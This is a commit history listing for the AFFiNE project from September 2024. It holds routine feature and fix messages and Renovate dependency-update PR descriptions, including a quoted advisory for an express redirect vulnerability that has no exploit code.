- [`a37c064`](https://redirect.github.com/oxc-project/oxc/commit/a37c064 ) linter: Use `ContentHash` for `no_duplicate_case`; remove `calculate_hash` ([#​5648](https://redirect.github.com/oxc-project/oxc/issues/5648 )) (Boshen)
- [`0b3c1d7`](https://redirect.github.com/oxc-project/oxc/commit/0b3c1d7 ) linter: Start internal/external split of `OxlintConfig` ([#​5595](https://redirect.github.com/oxc-project/oxc/issues/5595 )) (DonIsaac)
- [`89bdf55`](https://redirect.github.com/oxc-project/oxc/commit/89bdf55 ) linter: Inline `Rule` trait default methods ([#​5619](https://redirect.github.com/oxc-project/oxc/issues/5619 )) (overlookmotel)
- [`afea8d5`](https://redirect.github.com/oxc-project/oxc/commit/afea8d5 ) linter: Rename `Rule` trait method params ([#​5617](https://redirect.github.com/oxc-project/oxc/issues/5617 )) (overlookmotel)
- [`4e748b5`](https://redirect.github.com/oxc-project/oxc/commit/4e748b5 ) linter: Replace ast "compare by hash" to "compare by content" ([#​5602](https://redirect.github.com/oxc-project/oxc/issues/5602 )) (dalaoshu)
- [`bac03e3`](https://redirect.github.com/oxc-project/oxc/commit/bac03e3 ) linter: Make fields of `LintServiceOptions` private ([#​5593](https://redirect.github.com/oxc-project/oxc/issues/5593 )) (DonIsaac)
- [`2661d8b`](https://redirect.github.com/oxc-project/oxc/commit/2661d8b ) linter: Jest prefer_strict_equal ([#​5588](https://redirect.github.com/oxc-project/oxc/issues/5588 )) (IWANABETHATGUY)
- [`067f9b5`](https://redirect.github.com/oxc-project/oxc/commit/067f9b5 ) semantic: Introduce `IsGlobalReference` trait ([#​5672](https://redirect.github.com/oxc-project/oxc/issues/5672 )) (Boshen)- [`26d9235`](https://redirect.github.com/oxc-project/oxc/commit/26d9235 ) Enable clippy::ref_as_ptr ([#​5577](https://redirect.github.com/oxc-project/oxc/issues/5577 )) (夕舞八弦)
##### Testing
- [`8e79f8d`](https://redirect.github.com/oxc-project/oxc/commit/8e79f8d ) linter: Add class method test cases for `oxc/no-async-await` ([#​5550](https://redirect.github.com/oxc-project/oxc/issues/5550 )) (DonIsaac)
- [`3835189`](https://redirect.github.com/oxc-project/oxc/commit/3835189 ) linter: Add test case for no_unused_vars in [`3b87ac4`](https://redirect.github.com/oxc-project/oxc/commit/3b87ac4 ) (Boshen)
- [`5f27551`](https://redirect.github.com/oxc-project/oxc/commit/5f27551 ) linter: Add a passing case to no_undef ([#​5580](https://redirect.github.com/oxc-project/oxc/issues/5580 )) (Boshen)
### [`v0.9.4`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#094---2024-09-12 )
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.3...oxlint_v0.9.4 )
##### Features
- [`023c160`](https://redirect.github.com/oxc-project/oxc/commit/023c160 ) linter: Impl `Serialize` for `OxlintConfig` ([#​5594](https://redirect.github.com/oxc-project/oxc/issues/5594 )) (DonIsaac)
### [`v0.9.3`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#093---2024-09-07 )
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.2...oxlint_v0.9.3 )
##### Styling
- [`694f032`](https://redirect.github.com/oxc-project/oxc/commit/694f032 ) Add trailing line breaks to `package.json` files ([#​5542](https://redirect.github.com/oxc-project/oxc/issues/5542 )) (overlookmotel)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNzQuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-13 04:07:34 +00:00
renovate
7f4b069f5e
chore: bump up @chromatic-com/storybook version to v2 ( #8178 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@chromatic-com/storybook](https://redirect.github.com/chromaui/addon-visual-tests ) | [`^1` -> `^2.0.0`](https://renovatebot.com/diffs/npm/@chromatic-com%2fstorybook/1.8.0/2.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>chromaui/addon-visual-tests (@​chromatic-com/storybook)</summary>
### [`v2.0.0`](https://redirect.github.com/chromaui/addon-visual-tests/blob/HEAD/CHANGELOG.md#v200-Mon-Sep-09-2024 )
[Compare Source](https://redirect.github.com/chromaui/addon-visual-tests/compare/v1.9.0...v2.0.0 )
##### 💥 Breaking Change
- Align with Storybook 8.2 core package layout [#​330](https://redirect.github.com/chromaui/addon-visual-tests/pull/330 ) ([@​ndelangen](https://redirect.github.com/ndelangen ) [@​ghengeveld](https://redirect.github.com/ghengeveld ))
##### Authors: 2
- Gert Hengeveld ([@​ghengeveld](https://redirect.github.com/ghengeveld ))
- Norbert de Langen ([@​ndelangen](https://redirect.github.com/ndelangen ))
***
### [`v1.9.0`](https://redirect.github.com/chromaui/addon-visual-tests/blob/HEAD/CHANGELOG.md#v190-Fri-Sep-06-2024 )
[Compare Source](https://redirect.github.com/chromaui/addon-visual-tests/compare/v1.8.0...v1.9.0 )
##### 🚀 Enhancement
- Relay client-side fetch requests to the server using the Storybook channel API [#​331](https://redirect.github.com/chromaui/addon-visual-tests/pull/331 ) ([@​ghengeveld](https://redirect.github.com/ghengeveld ))
##### Authors: 1
- Gert Hengeveld ([@​ghengeveld](https://redirect.github.com/ghengeveld ))
***
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-13 03:51:36 +00:00
renovate
b690653451
chore: bump up sinon version to v19 ( #8231 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [sinon](https://sinonjs.org/ ) ([source](https://redirect.github.com/sinonjs/sinon )) | [`^18.0.0` -> `^19.0.0`](https://renovatebot.com/diffs/npm/sinon/18.0.0/19.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>sinonjs/sinon (sinon)</summary>
### [`v19.0.0`](https://redirect.github.com/sinonjs/sinon/blob/HEAD/CHANGES.md#1900 )
[Compare Source](https://redirect.github.com/sinonjs/sinon/compare/v18.0.1...v19.0.0 )
- [`3534ab4f`](3534ab4fb0 )
Bump samsam and nise to latest versions ([#​2617](https://redirect.github.com/sinonjs/sinon/issues/2617 )) (Carl-Erik Kopseng)
> Ensures consistency and less breakage when there are "circular" dependencies.
- [`912c568d`](912c568d30 )
upgrade fake timers and others ([#​2612](https://redirect.github.com/sinonjs/sinon/issues/2612 )) (Carl-Erik Kopseng)
> - Upgrade dependencies (includes breaking API in Fake Timers)
> - fake-timers: no longer creating dates using the original Date class, but a subclass (proxy)
- [`9715798e`](9715798e30 )
Use newer @​mochify/\* packages ([#​2609](https://redirect.github.com/sinonjs/sinon/issues/2609 )) (Carl-Erik Kopseng)
> Co-authored-by: Maximilian Antoni <mail@maxantoni.de >
*Released by [Carl-Erik Kopseng](https://redirect.github.com/fatso83 ) on 2024-09-13.*
### [`v18.0.1`](https://redirect.github.com/sinonjs/sinon/blob/HEAD/CHANGES.md#1801 )
[Compare Source](https://redirect.github.com/sinonjs/sinon/compare/v18.0.0...v18.0.1 )
Basically a patch release to update a transitive dependency in Nise.
- [`03e33ec6`](03e33ec647 )
Pin fake-timers@11.2.2 to avoid breaking change (Carl-Erik Kopseng)
- [`5a7924ad`](5a7924ad94 )
Add createStubInstance header in stubs.md (Daniel Kaplan)
- [`ad6804cd`](ad6804cd41 )
Bump elliptic from 6.5.5 to 6.5.7 ([#​2608](https://redirect.github.com/sinonjs/sinon/issues/2608 )) (dependabot\[bot])
- [`033287bd`](033287bded )
Bump path-to-regexp and nise ([#​2611](https://redirect.github.com/sinonjs/sinon/issues/2611 )) (dependabot\[bot])
> Bumps [path-to-regexp](https://redirect.github.com/pillarjs/path-to-regexp ) to 8.1.0 and updates ancestor dependency [nise](https://redirect.github.com/sinonjs/nise ). These dependencies need to be updated together.
>
> Updates `path-to-regexp` from 6.2.2 to 8.1.0
>
> - [Release notes](https://redirect.github.com/pillarjs/path-to-regexp/releases )
> - [Changelog](https://redirect.github.com/pillarjs/path-to-regexp/blob/master/History.md )
> - [Commits](https://redirect.github.com/pillarjs/path-to-regexp/compare/v6.2.2...v8.1.0 )
>
> Updates `nise` from 6.0.0 to 6.0.1
>
> - [Changelog](https://redirect.github.com/sinonjs/nise/blob/main/History.md )
> - [Commits](https://redirect.github.com/sinonjs/nise/commits )
>
> ***
>
> updated-dependencies:
>
> - dependency-name: path-to-regexp
>
> dependency-type: indirect
>
> - dependency-name: nise
>
> dependency-type: direct:production
>
> ...
>
> Signed-off-by: dependabot\[bot] <support@github.com >
>
> Co-authored-by: dependabot\[bot] <49699333+dependabot\[bot][@​users](https://redirect.github.com/users ).noreply.github.com>
- [`0c609f95`](0c609f95b1 )
re-add testing of esm browser builds (Carl-Erik Kopseng)
> It seems unclear why it was removed in the first place: I have tested extensively that it
> does work and it does fail the build if changing any assertion in the script
- [`da4230a0`](da4230a00c )
Bump braces from 3.0.2 to 3.0.3 ([#​2605](https://redirect.github.com/sinonjs/sinon/issues/2605 )) (dependabot\[bot])
> Bumps [braces](https://redirect.github.com/micromatch/braces ) from 3.0.2 to 3.0.3.
>
> - [Changelog](https://redirect.github.com/micromatch/braces/blob/master/CHANGELOG.md )
> - [Commits](https://redirect.github.com/micromatch/braces/compare/3.0.2...3.0.3 )
>
> ***
>
> updated-dependencies:
>
> - dependency-name: braces
>
> dependency-type: indirect
>
> ...
>
> Signed-off-by: dependabot\[bot] <support@github.com >
>
> Co-authored-by: dependabot\[bot] <49699333+dependabot\[bot][@​users](https://redirect.github.com/users ).noreply.github.com>
- [`02542370`](02542370a4 )
feat(ci): add node v22 ([#​2600](https://redirect.github.com/sinonjs/sinon/issues/2600 )) (Rotzbua)
- [`794cb81a`](794cb81a3b )
fix(tests): typo ([#​2603](https://redirect.github.com/sinonjs/sinon/issues/2603 )) (Rotzbua)
- [`1eb2a254`](1eb2a25486 )
Use NodeJS 22.2.0 as base development version (Carl-Erik Kopseng)
- [`1aa713fd`](1aa713fd41 )
Bump rexml from 3.2.5 to 3.2.8 ([#​2599](https://redirect.github.com/sinonjs/sinon/issues/2599 )) (dependabot\[bot])
> Bumps [rexml](https://redirect.github.com/ruby/rexml ) from 3.2.5 to 3.2.8. >
>
> - [Release notes](https://redirect.github.com/ruby/rexml/releases ) >
> - [Changelog](https://redirect.github.com/ruby/rexml/blob/master/NEWS.md ) >
> - [Commits](https://redirect.github.com/ruby/rexml/compare/v3.2.5...v3.2.8 ) > >
> \--- >
> updated-dependencies: >
> - dependency-name: rexml >
> dependency-type: indirect >
> ... > >
> Signed-off-by: dependabot\[bot] <support@github.com > >
> Co-authored-by: dependabot\[bot] <49699333+dependabot\[bot][@​users](https://redirect.github.com/users ).noreply.github.com>
*Released by [Carl-Erik Kopseng](https://redirect.github.com/fatso83 ) on 2024-09-10.*
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC43NC4xIiwidXBkYXRlZEluVmVyIjoiMzguNzQuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-13 02:22:03 +00:00
Saul-Mirone
445acfa323
chore: bump bs ( #8227 )
2024-09-13 02:10:16 +00:00
fundon
39a5d8e64f
fix(core): reference link icon ( #8223 )
...
Closes [AF-1384](https://linear.app/affine-design/issue/AF-1384/edgeless-reference-icon-在fail版本中显示不正确 )
2024-09-12 11:56:07 +00:00
pengx17
4b920a867c
fix(electron): app fallback styles ( #8225 )
2024-09-12 11:21:29 +00:00
pengx17
d2b482bcb2
fix(electron): incorrect path to root dir ( #8220 )
2024-09-12 09:00:18 +00:00
renovate
23c7f8b01d
chore: bump up express version to v4.20.0 [SECURITY] ( #8205 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [express](http://expressjs.com/ ) ([source](https://redirect.github.com/expressjs/express )) | [`4.19.2` -> `4.20.0`](https://renovatebot.com/diffs/npm/express/4.19.2/4.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
### GitHub Vulnerability Alerts
#### [CVE-2024-43796](https://redirect.github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx )
### Impact
In express <4.20.0, passing untrusted user input - even after sanitizing it - to `response.redirect()` may execute untrusted code
### Patches
this issue is patched in express 4.20.0
### Workarounds
users are encouraged to upgrade to the patched version of express, but otherwise can workaround this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist
### Details
successful exploitation of this vector requires the following:
1. The attacker MUST control the input to response.redirect()
1. express MUST NOT redirect before the template appears
1. the browser MUST NOT complete redirection before:
1. the user MUST click on the link in the template
---
### Release Notes
<details>
<summary>expressjs/express (express)</summary>
### [`v4.20.0`](https://redirect.github.com/expressjs/express/blob/HEAD/History.md#4200--2024-09-10 )
[Compare Source](https://redirect.github.com/expressjs/express/compare/4.19.2...4.20.0 )
\==========
- deps: serve-static@0.16 .0
- Remove link renderization in html while redirecting
- deps: send@0.19 .0
- Remove link renderization in html while redirecting
- deps: body-parser@0.6.0
- add `depth` option to customize the depth level in the parser
- IMPORTANT: The default `depth` level for parsing URL-encoded data is now `32` (previously was `Infinity`)
- Remove link renderization in html while using `res.redirect`
- deps: path-to-regexp@0.1.10
- Adds support for named matching groups in the routes using a regex
- Adds backtracking protection to parameters without regexes defined
- deps: encodeurl@~2.0.0
- Removes encoding of `\`, `|`, and `^` to align better with URL spec
- Deprecate passing `options.maxAge` and `options.expires` to `res.clearCookie`
- Will be ignored in v5, clearCookie will set a cookie with an expires in the past to instruct clients to delete the cookie
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-12 08:43:05 +00:00
fundon
8a9d9b42a3
feat(core): support block links on cmdk ( #8192 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8260
Closes: [BS-1323](https://linear.app/affine-design/issue/BS-1323/粘贴-link-to-block-到-link-弹窗,不符合预期 )
2024-09-12 08:25:28 +00:00
JimmFly
2cba8a4ccd
fix(core): title could not be changed when creating a new doc ( #8203 )
...
Before change, the title could not be modified from outside the editor without refreshing:
https://github.com/user-attachments/assets/536acba1-4e31-418a-bc1a-8578e3128bba
after:
https://github.com/user-attachments/assets/30a4b270-b8b1-4787-acef-0ab2a72a8f74
2024-09-12 07:55:23 +00:00
EYHN
cc5a6e6d40
refactor: new project struct ( #8199 )
...
packages/frontend/web -> packages/frontend/apps/web
packages/frontend/mobile -> packages/frontend/apps/mobile
packages/frontend/electron -> packages/frontend/apps/electron
2024-09-12 07:42:57 +00:00
L-Sun
7c4eab6cd3
fix(core): add edit entry for mobile edition ( #8173 )
2024-09-12 06:48:22 +00:00
JimmFly
8e71815e46
fix(component): windows client does not have app controls on some pages ( #8176 )
...
close AF-1266
2024-09-12 06:35:55 +00:00
EYHN
3999b04cf1
feat(core): download template from snapshot url ( #8211 )
2024-09-12 06:21:52 +00:00
zzj3720
aad7b90859
feat(core): add database full-width feature flag ( #8210 )
2024-09-12 05:14:13 +00:00
akumatus
456aa047cb
fix: missing font in text preview of editor settings ( #8213 )
...
Close issue [BS-1394](https://linear.app/affine-design/issue/BS-1394 ).
Add `FontConfigExtension` to `edgeless:preview` spec.
2024-09-12 04:40:17 +00:00
doouding
393dcfec78
feat: bump bs ( #8212 )
...
https://github.com/toeverything/blocksuite/pull/8311
2024-09-12 04:28:14 +00:00
pengx17
24bf1beac8
fix(electron): devtools open in detach mode ( #8200 )
...
fix AF-1380
2024-09-12 03:20:19 +00:00
CatsJuice
8bf0458ef4
fix(mobile): remove all focus style for link and button ( #8208 )
2024-09-12 03:07:31 +00:00
Saul-Mirone
ba81b1a9ca
chore: bump bs ( #8204 )
2024-09-11 12:04:26 +00:00
fundon
b74dd1c92e
feat(core): support block links on Bi-Directional Links ( #8169 )
...
Clsoes [AF-1348](https://linear.app/affine-design/issue/AF-1348/修复-bi-directional-links-里面的链接地址 )
* Links to the current document should be ignored on `Backlinks`
* Links to the current document should be ignored on `Outgoing links`
https://github.com/user-attachments/assets/dbc43cea-5aca-4c6f-886a-356e3a91c1f1
2024-09-11 11:08:12 +00:00
CatsJuice
b7d05d2078
feat(core): new empty states for doc/collection/tag ( #8197 )
...
AF-1329, AF-1330
2024-09-11 10:48:52 +00:00
akumatus
f12655655e
feat: add mindmap and connector settings ( #8198 )
...
### What changed?
- Add `connector` label settings.
- Add `mindmap` style settings.
- Add skeleton loading placeholder.
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/sJGviKxfE3Ap685cl5bj/31159d74-ef62-4c7f-b1d9-cde73047cf29.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/sJGviKxfE3Ap685cl5bj/31159d74-ef62-4c7f-b1d9-cde73047cf29.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/sJGviKxfE3Ap685cl5bj/31159d74-ef62-4c7f-b1d9-cde73047cf29.mov ">录屏2024-09-11 16.30.17.mov</video>
2024-09-11 09:17:11 +00:00
EYHN
85aa73bcf6
fix(core): disconnect ws when user logout ( #8188 )
2024-09-11 07:55:42 +00:00
EYHN
d93c3b3719
feat(core): user data db ( #7930 )
2024-09-11 07:55:37 +00:00
EYHN
498a69af53
feat(core): move enable ai to feature flag ( #8195 )
2024-09-11 07:42:07 +00:00
EYHN
8c191e6baa
feat(core): preview template & snapshot import ( #8193 )
2024-09-11 07:11:33 +00:00
doouding
52d9569f47
feat: add mind map import feature flag ( #8196 )
2024-09-11 06:27:47 +00:00
EYHN
f009371e06
fix(core): fix menu shaking ( #8187 )
2024-09-11 03:42:13 +00:00
forehalo
7a546ff8a1
feat(core): add auth metrics ( #8194 )
...
close AF-849
2024-09-11 03:28:32 +00:00
CatsJuice
81ab8ac8b3
feat(mobile): pwa and browser theme-color optimization ( #8168 )
...
[AF-1325](https://linear.app/affine-design/issue/AF-1325/优化-pwa-体验 ), [AF-1317](https://linear.app/affine-design/issue/AF-1317/优化:-pwa-的顶部-status-bar-颜色应与背景保持一致 ), [AF-1318](https://linear.app/affine-design/issue/AF-1318/优化:pwa-的底部应当有符合设备安全高度的padding ), [AF-1321](https://linear.app/affine-design/issue/AF-1321/更新一下-fail-的-pwa-icon )
- New `<SafeArea />` ui component
- New `useThemeColorV1` / `useThemeColorV2` hook:
- to modify `<meta name="theme-color" />` with given theme key
2024-09-11 02:20:59 +00:00
L-Sun
9038592715
fix(core): disable append paragraph in shared page editor ( #8191 )
...
Disable append paragraph function for readonly or shared page editor.
### Before

2024-09-10 15:33:52 +00:00
L-Sun
6ce6cb33ef
feat(core): add outline viewer for share page ( #8190 )
2024-09-10 14:00:17 +00:00
Saul-Mirone
daa9d9ff5c
chore: bump bs ( #8189 )
2024-09-10 13:48:08 +00:00
darkskygit
95738e796f
fix: client captcha ( #8186 )
2024-09-10 09:34:21 +00:00
JimmFly
9ccf517e06
chore: adjust the border color of Point component ( #8185 )
...
close AF-1367
2024-09-10 09:22:34 +00:00
JimmFly
31561d8203
chore: bump theme version ( #8184 )
2024-09-10 09:05:30 +00:00
donteatfriedrice
9dfd366382
fix: ai error message tip would be cut off ( #8183 )
...
Use `<affine-tooltip>` component that updates the float position when it might be clipped。
Fix: [BS-1386](https://linear.app/affine-design/issue/BS-1386/[bug]-tooltip-位置错误 )
2024-09-10 08:12:05 +00:00
JimmFly
4c0d0ab8de
fix(core): page jumps unexpectedly when clicking the collection operation ( #8182 )
...
close AF-1371
https://github.com/user-attachments/assets/9cc25790-8755-458c-94ac-a8d1b584c428
2024-09-10 06:38:33 +00:00
EYHN
0cdc486f1f
fix(core): reduce state refresh ( #8181 )
2024-09-10 06:21:15 +00:00
pengx17
fb76fdfca3
fix(core): menu not scrollable when opening in modal ( #8179 )
...
fix AF-1360
When menu (with modal = false) is rendered in Modal, the [RemoveScroll utility wrapped by Modal](660060a765/packages/react/dialog/src/Dialog.tsx (L203) ) will prevent menu from scrolling.
The reason why menu is scrollable within a dialog is because it is also wrapped a RemoveScroll [when modal is on. ](660060a765/packages/react/menu/src/Menu.tsx (L305) )
In this fix, added a `useWithinModal` utility hook so that menu will automatically assign noportal mode for menu when it is rendered inside of a modal.
2024-09-10 06:09:00 +00:00
JimmFly
9d343bdaa6
feat(core): add enable url preview to workspace settings ( #8089 )
2024-09-10 04:04:06 +00:00
Brooooooklyn
fe1eefdbb2
feat: init renderer server ( #8088 )
2024-09-10 04:03:59 +00:00
forehalo
0add8917f9
feat(server): enable share og information for docs ( #7794 )
2024-09-10 04:03:52 +00:00
darkskygit
34eac4c24e
feat: improve ai query performance ( #8170 )
2024-09-09 09:39:28 +00:00
JimmFly
b48cc825e0
fix(core): unexpected jump when clicking save tag ( #8171 )
...
close AF-1285
https://github.com/user-attachments/assets/1ec4adf5-4340-4e94-9e56-6a05e7a65f18
2024-09-09 07:54:56 +00:00
forehalo
32f673fa3d
perf(server): index lower user email ( #8167 )
2024-09-09 04:43:59 +00:00
JimmFly
a7ecfea3b5
fix(core): disable border thickness setting when no border is selected ( #8152 )
...
close AF-1351
2024-09-09 03:25:04 +00:00
fundon
6b266e3a1b
fix(core): link copying and pasting ( #8157 )
...
Related to: https://github.com/toeverything/blocksuite/pull/8233
2024-09-09 03:11:20 +00:00
forehalo
d31565eb98
ci(mobile): typecheck ( #8166 )
2024-09-09 02:59:50 +00:00
darkskygit
2a135d8a93
feat: add index for snapshots ( #8163 )
2024-09-08 13:49:41 +00:00
forehalo
57083905ff
fix(core): strict client oauth parameters check ( #8159 )
2024-09-08 12:44:47 +00:00
forehalo
63e1fce3ca
perf(server): accelerate user workspace permission queries ( #8161 )
2024-09-08 12:04:00 +00:00
forehalo
87e9ff01b5
perf(server): avoid filter doc snapshot by non-indexed updatedAt ( #8160 )
2024-09-08 12:03:55 +00:00
Saul-Mirone
32d3769201
chore: bump bs ( #8153 )
2024-09-07 04:08:22 +00:00
CatsJuice
87ed358f2e
fix(mobile): adjust mobile ui ( #8112 )
...
close AF-1274, AF-1320, AF-1333
2024-09-06 13:40:10 +00:00
forehalo
4de9d94c80
chore(core): publish editor settings in beta ( #8149 )
2024-09-06 11:54:26 +00:00
JimmFly
817306ea2a
chore: sort font weight options ( #8151 )
...
close PD-1684
2024-09-06 11:41:18 +00:00
pengx17
487154ed3b
fix(core): nav item line-height with Emoji ( #8148 )
2024-09-06 11:28:22 +00:00
forehalo
817842cf72
fix(core): oauth links should have origin prefix in desktop ( #8150 )
2024-09-06 11:16:19 +00:00
Saul-Mirone
84ebe62edc
chore: bump bs to lts ( #8147 )
2024-09-06 10:54:19 +00:00
JimmFly
e822bbd2dd
fix(core): deleted doc should not appear in tag pages ( #8143 )
...
close AF-1206
2024-09-06 10:40:03 +00:00
JimmFly
7fe8d7e96f
fix(core): adjust editor settings preview style ( #8146 )
...
close PD-1680 PD-1682 PD-1683
https://github.com/user-attachments/assets/49ed9ffe-8e8f-403d-91a0-e42b7f4ffb04
2024-09-06 10:06:19 +00:00
pengx17
cd5c512a5f
fix(electron): auto update check on windows ( #8137 )
...
turns out activate event is only available on macos
2024-09-06 09:41:25 +00:00
pengx17
d089470bbf
feat(electron): electron shell skeleton ( #8127 )
...
fix AF-1331
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/T2klNLEk0wxLh4NRDzhk/e09203aa-f143-42f8-bd39-e5078d07ada2.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/T2klNLEk0wxLh4NRDzhk/e09203aa-f143-42f8-bd39-e5078d07ada2.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/T2klNLEk0wxLh4NRDzhk/e09203aa-f143-42f8-bd39-e5078d07ada2.mp4 ">1.mp4</video>
missing
- per split view skeleton
- per route skeleton
2024-09-06 09:25:20 +00:00
akumatus
16bb00ed78
fix: load snapshot files in parallel ( #8145 )
2024-09-06 09:12:57 +00:00
forehalo
bffc294620
fix(core): oauth popup blocked in safari ( #8144 )
...
fix(core): oauth popup blocked in safari
fix(core): standarize auth routes
fix AF-1352
2024-09-06 08:26:27 +00:00
forehalo
be4df0f8ac
fix(server): created user in update table should not have defualt value ( #8134 )
2024-09-06 06:42:04 +00:00
forehalo
64d2b926a2
fix(server): remove default auth redirect url ( #8140 )
2024-09-06 06:26:59 +00:00
JimmFly
a027cef457
fix(core): some fonts are unavailable ( #8139 )
...
close AF-1349 AF-1347
2024-09-06 05:08:12 +00:00
fundon
7d93fae1dd
fix(core): inlineEditor on rich-text may be null ( #8131 )
...
See 3d3d9d7862/packages/affine/components/src/rich-text/rich-text.ts (L348-L350)
https://github.com/toeverything/blocksuite/blob/master/packages/affine/components/src/rich-text/rich-text.ts#L36
2024-09-06 03:50:05 +00:00
EYHN
702c03539f
fix(core): fix member list fallback size ( #8133 )
2024-09-06 02:38:30 +00:00
EYHN
52cd6102cb
fix: fix download fonts script ( #8125 )
2024-09-06 00:37:57 +08:00
EYHN
74cd175d37
feat(core): invoice service ( #8124 )
2024-09-05 23:56:58 +08:00
akumatus
9cbe416c2c
feat(core): shape editor settings ( #8122 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/sJGviKxfE3Ap685cl5bj/cdf4f95c-15b4-4eac-be57-26974f9ca02b.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/sJGviKxfE3Ap685cl5bj/cdf4f95c-15b4-4eac-be57-26974f9ca02b.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/sJGviKxfE3Ap685cl5bj/cdf4f95c-15b4-4eac-be57-26974f9ca02b.mov ">录屏2024-09-05 21.20.31.mov</video>
2024-09-05 15:24:37 +00:00
EYHN
f4db4058f8
feat(core): make permission and invoice offline available ( #8123 )
2024-09-05 15:11:27 +00:00
JimmFly
8be67dce82
fix(core): remove joined workspace icon from current worksapce card ( #8117 )
...
close PD-1669
2024-09-05 14:58:29 +00:00
fundon
017e89f458
fix(core): should be bound to the correct object ( #8121 )
...
<img width="795" alt="Screenshot 2024-09-05 at 18 05 35" src="https://github.com/user-attachments/assets/46f277e9-9be6-4f71-b765-fc442a3a9c64 ">
2024-09-05 14:46:04 +00:00
pengx17
d3f50a2e38
feat(core): expose skip login button to web ( #8115 )
...

Allow user skip login page on client
2024-09-05 14:33:22 +00:00
JimmFly
d0010a1d11
chore: add i18n support for ai confirm modal ( #8116 )
